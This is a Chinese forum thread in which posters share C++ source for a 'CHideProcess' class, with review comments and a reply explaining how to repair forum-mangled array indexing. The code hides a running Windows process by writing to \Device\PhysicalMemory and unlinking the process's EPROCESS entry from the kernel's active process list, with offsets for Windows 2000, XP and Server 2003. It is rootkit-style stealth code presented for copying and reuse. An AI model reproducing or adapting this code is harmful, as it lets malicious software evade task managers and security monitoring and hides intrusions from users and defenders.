// non-PAE two-level page-table walk.  BaseAddress is the mapped page
// directory; VAddr>>22 selects the PDE.  A 4 MiB page (PS bit, 0x80) is
// resolved directly; otherwise the page-table page is mapped read-only
// (4 == FILE_MAP_READ) and the PTE is selected by bits 21..12.
// Returns 0 when the PDE or PTE is not present.
// NOTE(review): the "PTE not present" return leaks the view mapped just
// above, and a NULL return from MapViewOfFile is dereferenced unchecked.
PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr;
    ULONG PGDE = BaseAddress[VAddr>>22];        // PDE: top 10 bits index the directory
    ULONG PTE;
    ULONG PAddr;
    if (0 == (PGDE & 1))                        // PDE present bit clear
        return 0;
    ULONG tmp = PGDE & 0x00000080;              // PS bit: 4 MiB large page
    if (0 != tmp)
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        TFileTrace(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000);   // (message text is a copy-paste from GetData)
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
        if (0 == (PTE&1))
            return 0;                           // NOTE(review): view from MapViewOfFile above is leaked here
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }
    return (PVOID)PAddr;
}

//---------------------------------------------------------------------------
// Reads one ULONG at kernel virtual address addr: translates it with
// LinearToPhys(), maps the containing 4 KiB physical page and indexes it.
// Returns 0 on any failure, which is indistinguishable from a real 0.
ULONG CHideProcess::GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    TFileTrace(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"), g_pMapPhysicalMemory, addr, phys);
    TFileTrace(_T("GetData() OffSet: %p\n"), phys & 0xfffff000);
    PULONG tmp = (PULONG)MapViewOfFile(
        g_hMPM,
        FILE_MAP_READ|FILE_MAP_WRITE,
        0,
        phys & 0xfffff000,              // offset low part
        0x1000                          // size
        );
    if (0 == tmp)
        return 0;
    ULONG ret = tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
    return ret;
}

//---------------------------------------------------------------------------
// Writes one ULONG at kernel virtual address addr through a physical view.
// Returns FALSE only if the page could not be mapped; a translation failure
// (phys == 0) is not detected and would write to physical page 0.
BOOL CHideProcess::SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    TFileTrace(_T("SetData() OffSet: %p\n"), phys & 0xfffff000);
    PULONG tmp = (PULONG)MapViewOfFile(
        g_hMPM,
        FILE_MAP_WRITE,
        0,
        phys & 0xfffff000,
        0x1000
        );
    if (0 == tmp)
        return FALSE;
    tmp[(phys & 0xFFF)>>2] = data;
    UnmapViewOfFile(tmp);
    return TRUE;
}

//---------------------------------------------------------------------------
/*
long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp)
{
    ExitProcess(0);
    return 1 ;
}
//*/
//---------------------------------------------------------------------------
// Returns the kernel EPROCESS address of process PID, or 0 on failure.
// Opens a PROCESS_QUERY_INFORMATION handle to PID, then scans the system
// handle table for the entry owned by *this* process whose Handle equals
// that handle; the entry's Object field is the EPROCESS.  The query buffer
// is doubled while ZwQuerySystemInformation returns
// STATUS_INFO_LENGTH_MISMATCH.
// NOTE(review): every "h_info.xxx" below must be "h_info[i].xxx" (the forum
// swallowed the "[i]"); the free() inside the calloc-failure branch is dead.
DWORD CHideProcess::GetEprocessFromPid (ULONG PID)
{
    NTSTATUS status;
    PVOID buf = NULL;
    ULONG size = 1;
    ULONG NumOfHandle = 0;
    ULONG i;
    PSYSTEM_HANDLE_INFORMATION h_info = NULL;
    DWORD dwCurrentID = GetCurrentProcessId();
    // TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID);
    // LocateNtdllEntry( );

    // Open a handle to the target so it appears in our own handle list
    // (the original comment notes PROCESS objects have ObjectTypeNumber 5;
    // the code matches on the handle value instead).
    HANDLE hProc = OpenProcess( // PROCESS_ALL_ACCESS,
        PROCESS_QUERY_INFORMATION,
        FALSE,
        PID // GetCurrentProcessId() //
        );
    if (NULL == hProc)
    {
        TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
        TFileTrace(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
        return 0;
    }
    for ( size = 1024; ; size *= 2 )
    {
        if ( NULL == ( buf = calloc( size, 1 ) ) )
        {
            TRACE( _T("calloc( %u, 1 ) failed\n"), size );
            TFileTrace(_T("calloc( %u, 1 ) failed\n"), size );
            if ( buf != NULL )              // never true here: buf is NULL
            {
                free( buf );
                buf = NULL;
            }
            CloseHandle(hProc);
            return 0;
        }
        status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL );
        if ( !NT_SUCCESS( status ) )
        {
            if ( STATUS_INFO_LENGTH_MISMATCH == status )
            {
                free( buf );
                buf = NULL;
                continue;                   // retry with a doubled buffer
            }
            else
            {
                TFileTrace( "ZwQuerySystemInformation() failed\n");
                TRACE( "ZwQuerySystemInformation() failed\n");
                if ( buf != NULL )
                {
                    free( buf );
                    buf = NULL;
                }
                CloseHandle(hProc);
                return 0;
            }
        }
        else
        {
            break;
        }
    } /* end of for */

    // The buffer starts with a ULONG entry count; the entries follow it.
    NumOfHandle = *((PULONG)buf);
    h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4);
    for(i = 0; i < NumOfHandle; i++)
    {
        if(h_info.ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) )
        {
            // TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"),
            //     PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber);
            if (h_info.Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5)
            {
                // TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"),
                //     PID, hProc, h_info.Object);
                DWORD dwRet = (DWORD)(h_info.Object);   // kernel EPROCESS address
                if (buf != NULL)
                {
                    free( buf );
                    buf = NULL;
                }
                CloseHandle(hProc);
                return dwRet;
            }
        }
    }
    if ( buf != NULL )
    {
        free( buf );
        buf = NULL;
    }
    CloseHandle(hProc);
    return 0;
}

// Main hide routine: unlinks dwID's EPROCESS from ActiveProcessLinks.
// Returns TRUE once the two writes have been issued (their individual
// results are ignored); FALSE if ntdll is not initialised, the EPROCESS
// could not be found, or \Device\PhysicalMemory could not be opened.
// NOTE(review): if dwMinorVersion is none of 0/1/2, fw and bw are used
// uninitialised -- in practice OpenPhysicalMemory() has already rejected
// those versions.  The unlinked process's own Flink/Blink are left
// pointing at its former neighbours.
BOOL CHideProcess::YHideProcess(DWORD dwID)
{
    //
    if (!m_bInit)
    {
        AfxMessageBox(_T("load NTDLL failed..."));
        TFileTrace(_T("load NTDLL failed...\n"));
        return FALSE;
    }
    // Get the pointer to the process's EPROCESS block
    ULONG process = (ULONG)GetEprocessFromPid(dwID);
    if (process == 0)
    {
        // TFileTrace(_T("GetEprocessFromPid() failed...\n"));
        return FALSE;
    }
    TFileTrace(_T("GetEprocessFromPid() process = %p...\n"), process);
    // Open physical memory and map the page-directory page
    if (NULL == OpenPhysicalMemory())
    {
        AfxMessageBox(_T("OpenPhysicalMemory() failed..."));
        TFileTrace(_T("OpenPhysicalMemory() failed...\n"));
        return FALSE;
    }
    //
    // The two ifs below pick the ActiveProcessLinks offset inside EPROCESS
    // (Flink, then Blink 4 bytes after it) for the version OpenPhysicalMemory()
    // recorded in g_osvi; only 5.0 and 5.1/5.2 are handled.
    ULONG fw, bw;
    if (0 == g_osvi.dwMinorVersion)
    {
        // Windows 2000 (5.0).  (The original comment also said "Vista";
        // 6.x is rejected by the dwMajorVersion check in OpenPhysicalMemory.)
        fw = GetData(PVOID(process + 0xa0));
        bw = GetData(PVOID(process + 0xa4));
    }
    else if ((1 == g_osvi.dwMinorVersion) || (2 == g_osvi.dwMinorVersion))
    {
        // Windows XP (5.1) and Server 2003 (5.2)
        fw = GetData(PVOID(process + 0x88));
        bw = GetData(PVOID(process + 0x8c));
    }
    // ****
    TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
    TFileTrace(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
    // The two SetData() calls splice this EPROCESS out of the list:
    // next->Blink = our Blink; prev->Flink = our Flink.
    SetData(PVOID(fw + 4), bw);
    SetData(PVOID(bw), fw);
    // done
    UnmapViewOfFile(g_pMapPhysicalMemory);
    g_pMapPhysicalMemory = NULL;
    CloseHandle(g_hMPM);
    g_hMPM = NULL;
    return TRUE;
}

// Hide interface: hide the calling process.
BOOL CHideProcess::HideCurrent()
{
    TFileTrace(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId());
    return YHideProcess(GetCurrentProcessId());
}

// Hide interface: hide the process with PID dwID.
BOOL CHideProcess::HideByID(DWORD dwID)
{
    TFileTrace(_T("Hide Process ID = %d \n"), dwID);
    return YHideProcess(dwID);
}
18楼#
发布于:2007-04-27 18:33
哇塞,后面的内容怎么自动变成斜体了,是不是因为太长了?(应该是代码里 h_info[i] 的 "[i]" 被论坛当成了斜体标记,所以上面 GetEprocessFromPid 里的 h_info.ProcessId、h_info.Handle、h_info.Object 其实都是 h_info[i].xxx,照抄的时候要把下标补回来。)
这是比较久的代码了,貌似有点乱~
// CHideProcess: user-mode process hiding through \Device\PhysicalMemory
// (implementation in reply #17).  Every member is static; the one private
// static instance m_NoAction exists so that its constructor loads ntdll.dll
// at startup (recorded in m_bInit) and its destructor frees it at exit.
class CHideProcess
{
public:
    // Interface: hide the current process
    static BOOL HideCurrent();
    // Interface: hide the process with PID dwID (the original comment
    // wrongly repeated "current process" here)
    static BOOL HideByID(DWORD dwID);
    // destructor
    virtual ~CHideProcess();
protected:
    static BOOL InitNTDLL();
    static BOOL YHideProcess(DWORD dwID);
    static VOID CloseNTDLL();
    static VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
    static HANDLE OpenPhysicalMemory();
    static PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
    static ULONG GetData(PVOID addr);
    static BOOL SetData(PVOID addr,ULONG data);
    static DWORD GetEprocessFromPid (ULONG PID);
    // long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);
protected:
    static BOOL m_bInit;             // TRUE once InitNTDLL() succeeded
    static CHideProcess m_NoAction;  // the only instance (see class comment)
private:
    // constructor / destructor
    CHideProcess();
};
19楼#
发布于:2007-04-28 04:07
好,学习一下